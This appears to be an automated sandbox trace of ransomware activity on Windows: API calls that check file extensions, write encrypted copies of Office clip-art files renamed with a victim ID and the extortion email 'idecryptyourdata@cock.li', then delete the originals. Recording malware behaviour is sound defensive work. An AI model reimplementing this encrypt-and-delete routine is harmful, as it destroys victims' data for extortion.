lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.598] lstrlenW (lpString=".xlsx") returned 5 [0065.598] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.598] lstrlenW (lpString=".ppt") returned 4 [0065.598] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 68 [0065.599] lstrlenW (lpString=".zip") returned 4 [0065.599] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.599] lstrlenW (lpString=".rar") returned 4 [0065.599] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.599] lstrlenW (lpString=".bz2") returned 4 [0065.599] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.599] lstrlenW (lpString=".7z") returned 3 [0065.599] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 68 [0065.599] lstrlenW (lpString=".dbf") returned 4 [0065.599] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 68 [0065.599] lstrlenW (lpString=".1cd") returned 4 [0065.599] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 68 [0065.599] lstrlenW (lpString=".jpg") returned 4 [0065.599] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.599] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.599] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0065.600] GetLastError () returned 0x0 [0065.600] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2eda, lpOverlapped=0x0) returned 1 [0065.630] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2ee0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2ee0, lpOverlapped=0x0) returned 1 [0065.632] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.632] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.632] SetEndOfFile (hFile=0x384) returned 1 [0065.632] CloseHandle (hObject=0x384) returned 1 [0065.633] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.633] SetEndOfFile (hFile=0x388) returned 1 [0065.634] CloseHandle (hObject=0x388) returned 1 [0065.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.635] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf")) returned 1 [0065.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 68 [0065.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 68 [0065.635] lstrlenW (lpString=".doc") returned 4 [0065.635] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.635] lstrlenW (lpString=".docx") returned 5 [0065.635] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.635] lstrlenW (lpString=".pdf") returned 4 [0065.635] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.635] lstrlenW (lpString=".xls") returned 4 [0065.635] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.635] lstrlenW (lpString=".xlsx") returned 5 [0065.635] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.635] lstrlenW (lpString=".ppt") returned 4 [0065.635] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 68 [0065.636] lstrlenW (lpString=".zip") returned 4 [0065.636] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.636] lstrlenW (lpString=".rar") returned 4 [0065.636] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.636] lstrlenW (lpString=".bz2") returned 4 [0065.636] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.636] lstrlenW (lpString=".7z") returned 3 [0065.636] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 68 [0065.636] lstrlenW (lpString=".dbf") returned 4 [0065.636] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 68 [0065.636] lstrlenW (lpString=".1cd") returned 4 [0065.636] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 68 [0065.636] lstrlenW (lpString=".jpg") returned 4 [0065.636] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.637] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.637] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0065.638] GetLastError () returned 0x0 [0065.638] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x920e, lpOverlapped=0x0) returned 1 [0065.656] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x9210, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x9210, lpOverlapped=0x0) returned 1 [0065.658] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.658] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.658] SetEndOfFile (hFile=0x384) returned 1 [0065.658] CloseHandle (hObject=0x384) returned 1 [0065.660] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.660] SetEndOfFile (hFile=0x388) returned 1 [0065.662] CloseHandle (hObject=0x388) returned 1 [0065.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.662] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf")) returned 1 [0065.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 68 [0065.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 68 [0065.665] lstrlenW (lpString=".doc") returned 4 [0065.665] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.665] lstrlenW (lpString=".docx") returned 5 [0065.665] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.665] lstrlenW (lpString=".pdf") returned 4 [0065.666] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.666] lstrlenW (lpString=".xls") returned 4 [0065.666] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.666] lstrlenW (lpString=".xlsx") returned 5 [0065.666] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.666] lstrlenW (lpString=".ppt") returned 4 [0065.666] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 68 [0065.666] lstrlenW (lpString=".zip") returned 4 [0065.666] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.666] lstrlenW (lpString=".rar") returned 4 [0065.666] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.666] lstrlenW (lpString=".bz2") returned 4 [0065.666] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.666] lstrlenW (lpString=".7z") returned 3 [0065.666] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 68 [0065.666] lstrlenW (lpString=".dbf") returned 4 [0065.666] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 68 [0065.666] lstrlenW (lpString=".1cd") returned 4 [0065.666] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 68 [0065.666] lstrlenW (lpString=".jpg") returned 4 [0065.666] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.667] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.667] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0065.668] GetLastError () returned 0x0 [0065.668] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x3df0, lpOverlapped=0x0) returned 1 [0065.771] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3e00, lpOverlapped=0x0) returned 1 [0065.772] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.772] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.772] SetEndOfFile (hFile=0x384) returned 1 [0065.772] CloseHandle (hObject=0x384) returned 1 [0065.773] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.773] SetEndOfFile (hFile=0x388) returned 1 [0065.774] CloseHandle (hObject=0x388) returned 1 [0065.775] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.775] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf")) returned 1 [0065.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 68 [0065.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 68 [0065.775] lstrlenW (lpString=".doc") returned 4 [0065.775] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.775] lstrlenW (lpString=".docx") returned 5 [0065.775] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.775] lstrlenW (lpString=".pdf") returned 4 [0065.776] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.776] lstrlenW (lpString=".xls") returned 4 [0065.776] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.776] lstrlenW (lpString=".xlsx") returned 5 [0065.776] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.776] lstrlenW (lpString=".ppt") returned 4 [0065.776] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 68 [0065.776] lstrlenW (lpString=".zip") returned 4 [0065.776] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.776] lstrlenW (lpString=".rar") returned 4 [0065.776] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.776] lstrlenW (lpString=".bz2") returned 4 [0065.776] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.776] lstrlenW (lpString=".7z") returned 3 [0065.776] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 68 [0065.776] lstrlenW (lpString=".dbf") returned 4 [0065.776] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 68 [0065.776] lstrlenW (lpString=".1cd") returned 4 [0065.776] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 68 [0065.776] lstrlenW (lpString=".jpg") returned 4 [0065.776] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.777] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.777] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0065.777] GetLastError () returned 0x0 [0065.777] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xb6de, lpOverlapped=0x0) returned 1 [0066.288] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xb6e0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xb6e0, lpOverlapped=0x0) returned 1 [0066.289] ReadFile (in: hFile=0x388, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.290] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.290] SetEndOfFile (hFile=0x384) returned 1 [0066.311] CloseHandle (hObject=0x384) returned 1 [0066.312] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.312] SetEndOfFile (hFile=0x388) returned 1 [0066.314] CloseHandle (hObject=0x388) returned 1 [0066.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.314] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf")) returned 1 [0066.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 68 [0066.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 68 [0066.314] lstrlenW (lpString=".doc") returned 4 [0066.314] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.314] lstrlenW (lpString=".docx") returned 5 [0066.314] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.314] lstrlenW (lpString=".pdf") returned 4 [0066.314] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.315] lstrlenW (lpString=".xls") returned 4 [0066.315] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.315] lstrlenW (lpString=".xlsx") returned 5 [0066.315] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.315] lstrlenW (lpString=".ppt") returned 4 [0066.315] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 68 [0066.315] lstrlenW (lpString=".zip") returned 4 [0066.315] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.315] lstrlenW (lpString=".rar") returned 4 [0066.315] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.315] lstrlenW (lpString=".bz2") returned 4 [0066.315] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.315] lstrlenW (lpString=".7z") returned 3 [0066.315] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 68 [0066.315] lstrlenW (lpString=".dbf") returned 4 [0066.315] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 68 [0066.315] lstrlenW (lpString=".1cd") returned 4 [0066.315] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 68 [0066.315] lstrlenW (lpString=".jpg") returned 4 [0066.315] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.317] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.317] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0066.330] GetLastError () returned 0x0 [0066.330] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x5c0, lpOverlapped=0x0) returned 1 [0066.360] WriteFile (in: hFile=0x388, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x5d0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x5d0, lpOverlapped=0x0) returned 1 [0066.361] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.361] WriteFile (in: hFile=0x388, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.361] SetEndOfFile (hFile=0x388) returned 1 [0066.361] CloseHandle (hObject=0x388) returned 1 [0066.361] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.361] SetEndOfFile (hFile=0x370) returned 1 [0066.362] CloseHandle (hObject=0x370) returned 1 [0066.362] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.363] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf")) returned 1 [0066.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 68 [0066.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 68 [0066.379] lstrlenW (lpString=".doc") returned 4 [0066.379] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.379] lstrlenW (lpString=".docx") returned 5 [0066.379] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.379] lstrlenW (lpString=".pdf") returned 4 [0066.379] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.379] lstrlenW (lpString=".xls") returned 4 [0066.379] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.379] lstrlenW (lpString=".xlsx") returned 5 [0066.379] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.379] lstrlenW (lpString=".ppt") returned 4 [0066.379] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 68 [0066.379] lstrlenW (lpString=".zip") returned 4 [0066.379] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.379] lstrlenW (lpString=".rar") returned 4 [0066.379] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.379] lstrlenW (lpString=".bz2") returned 4 [0066.379] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.379] lstrlenW (lpString=".7z") returned 3 [0066.379] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 68 [0066.380] lstrlenW (lpString=".dbf") returned 4 [0066.380] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 68 [0066.380] lstrlenW (lpString=".1cd") returned 4 [0066.380] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 68 [0066.380] lstrlenW (lpString=".jpg") returned 4 [0066.380] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.382] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.383] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 